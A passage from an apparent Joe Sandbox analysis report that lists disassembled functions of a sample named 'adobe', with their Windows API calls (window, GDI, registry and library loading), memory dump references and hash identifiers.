                                                                                                                                                          • Opcode Fuzzy Hash: 77375f6f841bd32482ac362321ef56034a1adac8671eb50e5d38b587b56b4f6d
                                                                                                                                                          • Instruction Fuzzy Hash: FB1149B1744204BBDB10EBA9DC83F5E73B8DB48704F6044BABA04E72D2DA799D409759
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004821E4 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60
                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0048229C), ref: 00482281
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseOpen
                                                                                                                                                          • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                                                                                          • API String ID: 47109696-2530820420
                                                                                                                                                          • Opcode ID: 611116f75d8e82e5ff9034ecf45fc37e5a89b67be5737d76aba46fdeb4f9c35f
                                                                                                                                                          • Instruction ID: 87bf858376d3207450481095c65966a94705260f4f78797035e592602c621e2d
                                                                                                                                                          • Opcode Fuzzy Hash: 611116f75d8e82e5ff9034ecf45fc37e5a89b67be5737d76aba46fdeb4f9c35f
                                                                                                                                                          • Instruction Fuzzy Hash: 0911B230A04204AEDB10F7B6CE02B5F7BA8DB41354F1088B7A801E7692DBBCDD45875C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0041B472 Relevance: 10.6, APIs: 7, Instructions: 57windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                                                                                                          • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                                                                                                          • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ObjectSelect$Delete$Stretch
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1458357782-0
                                                                                                                                                          • Opcode ID: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                                                                                                          • Instruction ID: 28529174ed8a1a36c66279ad8c479dcd7ed434ba0fbaa502c63cdd0cc078bbc5
                                                                                                                                                          • Opcode Fuzzy Hash: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                                                                                                          • Instruction Fuzzy Hash: A1114C72E40559ABDF10D6D9D885FAFB3BCEF08704F048456B614FB241C678A8418B54
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00493B6C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • 73A1A570.USER32(00000000,?,?,00000000), ref: 00493B7D
                                                                                                                                                            • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00493B9F
                                                                                                                                                          • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,0049411D), ref: 00493BB3
                                                                                                                                                          • GetTextMetricsA.GDI32(00000000,?), ref: 00493BD5
                                                                                                                                                          • 73A1A480.USER32(00000000,00000000,00493BFF,00493BF8,?,00000000,?,?,00000000), ref: 00493BF2
                                                                                                                                                          Strings
                                                                                                                                                          • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00493BAA
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                                                                                                                          • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                                                                                          • API String ID: 1435929781-222967699
                                                                                                                                                          • Opcode ID: 50f57fb69113b7d2d502807a16d2e654426cf5b09d74d84ab9d1dc1b998f164d
                                                                                                                                                          • Instruction ID: 1fbb7d20c9a9065d84e9e10db6abc602dd2856f8c598f1399c904acfceb0a9fe
                                                                                                                                                          • Opcode Fuzzy Hash: 50f57fb69113b7d2d502807a16d2e654426cf5b09d74d84ab9d1dc1b998f164d
                                                                                                                                                          • Instruction Fuzzy Hash: BE018876644604BFDB00EFA9CC42F5EB7ECDB49705F514476B604E7281D678AE008B24
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004233A4 Relevance: 10.6, APIs: 7, Instructions: 56threadwindowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCursorPos.USER32 ref: 004233BF
                                                                                                                                                          • WindowFromPoint.USER32(?,?), ref: 004233CC
                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233DA
                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004233E1
                                                                                                                                                          • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233FA
                                                                                                                                                          • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423411
                                                                                                                                                          • SetCursor.USER32(00000000), ref: 00423423
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1770779139-0
                                                                                                                                                          • Opcode ID: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                                                                                                                          • Instruction ID: 219e0d69ac6b6a38dcb61baa39fbc914f783b163521ae56cddb293ea60412e1c
                                                                                                                                                          • Opcode Fuzzy Hash: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                                                                                                                          • Instruction Fuzzy Hash: E601D42230472036D6217B795C86E2F26A8CFC5B15F50457FB649BB283DA3D8C0063BD
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00493990 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(user32.dll), ref: 004939A0
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 004939AD
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 004939BA
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                          • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                                                                                          • API String ID: 667068680-2254406584
                                                                                                                                                          • Opcode ID: 14bef791376ecaf5d08d562cea50b4f2a2ad0213aa5007590d251579e9816345
                                                                                                                                                          • Instruction ID: a38205dd91106e4269d8d35c6bdf9212f34e9fda4a7f8cb7c0a7e7a7608b7ce0
                                                                                                                                                          • Opcode Fuzzy Hash: 14bef791376ecaf5d08d562cea50b4f2a2ad0213aa5007590d251579e9816345
                                                                                                                                                          • Instruction Fuzzy Hash: CAF0C292B4175467DE2069A60C82F7B6D8CCB83762F040137BD44A6282E9AD8E0542AD
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0045CEA8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetProcAddress.KERNEL32(02310000,BZ2_bzDecompressInit), ref: 0045CEB1
                                                                                                                                                          • GetProcAddress.KERNEL32(02310000,BZ2_bzDecompress), ref: 0045CEC1
                                                                                                                                                          • GetProcAddress.KERNEL32(02310000,BZ2_bzDecompressEnd), ref: 0045CED1
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                          • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                                                                                          • API String ID: 190572456-212574377
                                                                                                                                                          • Opcode ID: 43506d9456d00cdd0f0ea186958bc5b4fe8f0295514bb571b58465650bcbb3c2
                                                                                                                                                          • Instruction ID: 455f1597211012eadddf85cdc87209e4d4cec46549f5a6c4a532c2ec0858ec3d
                                                                                                                                                          • Opcode Fuzzy Hash: 43506d9456d00cdd0f0ea186958bc5b4fe8f0295514bb571b58465650bcbb3c2
                                                                                                                                                          • Instruction Fuzzy Hash: 04F0A4B1500700DEEB24DB26BEC67272697E7A4746F24843BD819A62A3F77C0449CA9C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042E890 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30libraryloaderwindowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00498934,004564E9,0045688C,00456440,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,0047FACB), ref: 0042E8A9
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E8AF
                                                                                                                                                          • InterlockedExchange.KERNEL32(0049A668,00000001), ref: 0042E8C0
                                                                                                                                                            • Part of subcall function 0042E820: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8E4,00000004,00498934,004564E9,0045688C,00456440,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E836
                                                                                                                                                            • Part of subcall function 0042E820: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E83C
                                                                                                                                                            • Part of subcall function 0042E820: InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E84D
                                                                                                                                                          • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00498934,004564E9,0045688C,00456440,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E8D4
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                                                                                                          • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                                                                                          • API String ID: 142928637-2676053874
                                                                                                                                                          • Opcode ID: a0ec9907562021e7333db6f05516d3642d49a00aa93e8de36608871adee76da8
                                                                                                                                                          • Instruction ID: c365c5bc722f159dc4e6bf90002f67a18111edd1cc3b7a2fef3254202be3c5aa
                                                                                                                                                          • Opcode Fuzzy Hash: a0ec9907562021e7333db6f05516d3642d49a00aa93e8de36608871adee76da8
                                                                                                                                                          • Instruction Fuzzy Hash: 02E092A1341720AAEB1077B77C8AF9A2258CB11729F5C4037F180A61D2C6BD0C90CE9E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0047783C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 14libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,004972E7), ref: 00477842
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 0047784F
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 0047785F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                          • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                                                                                          • API String ID: 667068680-222143506
                                                                                                                                                          • Opcode ID: 1d6d38e64a38dd3bcd5d86bb727f9caacaa2ffd05b1ff84c79f9e0b03c9c21b8
                                                                                                                                                          • Instruction ID: 88cce81a25e8d2b86f0fb0c4d26653f0a59eab0d1c2541fbda2dfec8285107fa
                                                                                                                                                          • Opcode Fuzzy Hash: 1d6d38e64a38dd3bcd5d86bb727f9caacaa2ffd05b1ff84c79f9e0b03c9c21b8
                                                                                                                                                          • Instruction Fuzzy Hash: 0CC0C9E0644700E99A00B7B2ACC6A77255CD500B24351843B7159AA183D67C48008E6D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0041B518 Relevance: 9.1, APIs: 6, Instructions: 113windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetFocus.USER32 ref: 0041B58E
                                                                                                                                                          • 73A1A570.USER32(?,00000000,0041B668,?,?,?,?), ref: 0041B59A
                                                                                                                                                          • 73A24620.GDI32(?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5B6
                                                                                                                                                          • 73A4E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5D3
                                                                                                                                                          • 73A4E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668), ref: 0041B5EA
                                                                                                                                                          • 73A1A480.USER32(?,?,0041B643,?,?), ref: 0041B636
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: E680$A24620A480A570Focus
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3709697839-0
                                                                                                                                                          • Opcode ID: 90736dfb4065eff224967c8bcb4d67110e7e5550b3a77470f42cb8b0a49e908e
                                                                                                                                                          • Instruction ID: 7d41d09f6123fe0998bcf531a8d6f09bc5b1e179d78523dd82c4b1b978091a2c
                                                                                                                                                          • Opcode Fuzzy Hash: 90736dfb4065eff224967c8bcb4d67110e7e5550b3a77470f42cb8b0a49e908e
                                                                                                                                                          • Instruction Fuzzy Hash: 7E41D571A04254AFDB10DFA9C886EAFBBB4EB55704F1484AAF500EB351D3389D11CBA5
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0045C86C Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 73COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetLastError.KERNEL32(00000057,00000000,0045C938,?,?,?,?,00000000), ref: 0045C8D7
                                                                                                                                                          • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045C9A4,?,00000000,0045C938,?,?,?,?,00000000), ref: 0045C916
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                          • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                                                                                          • API String ID: 1452528299-1580325520
                                                                                                                                                          • Opcode ID: 99b9f16503f7becb970105185d504024fca331f7ffa254ae058b9f8b432b0c4b
                                                                                                                                                          • Instruction ID: 4bc6690761fff3477fd1c78266aa95ca77ca80276c31c8ced3a67731b9c061d7
                                                                                                                                                          • Opcode Fuzzy Hash: 99b9f16503f7becb970105185d504024fca331f7ffa254ae058b9f8b432b0c4b
                                                                                                                                                          • Instruction Fuzzy Hash: C411A5B5204304AFE711EAA1C9C1BAA76ADDB44707F6040776D00A6283D63C9F0AA56D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0041BD9C Relevance: 9.1, APIs: 6, Instructions: 71COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemMetrics.USER32(0000000B), ref: 0041BDE5
                                                                                                                                                          • GetSystemMetrics.USER32(0000000C), ref: 0041BDEF
                                                                                                                                                          • 73A1A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDF9
                                                                                                                                                          • 73A24620.GDI32(00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE20
                                                                                                                                                          • 73A24620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE2D
                                                                                                                                                          • 73A1A480.USER32(00000000,00000000,0041BE73,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE66
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: A24620MetricsSystem$A480A570
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4042297458-0
                                                                                                                                                          • Opcode ID: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                                                                                                                          • Instruction ID: cee0947e7f2791638d7e7c91bd9cc57ffb528c4a132e606019bcc307a049f0f1
                                                                                                                                                          • Opcode Fuzzy Hash: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                                                                                                                          • Instruction Fuzzy Hash: 40212C74E046499FEB00EFA9C982BEEB7B4EB48714F10842AF514B7781D7785940CBA9
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0047CE74 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0047CE82
                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046BEC1), ref: 0047CEA8
                                                                                                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0047CEB8
                                                                                                                                                          • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047CED9
                                                                                                                                                          • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047CEED
                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047CF09
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
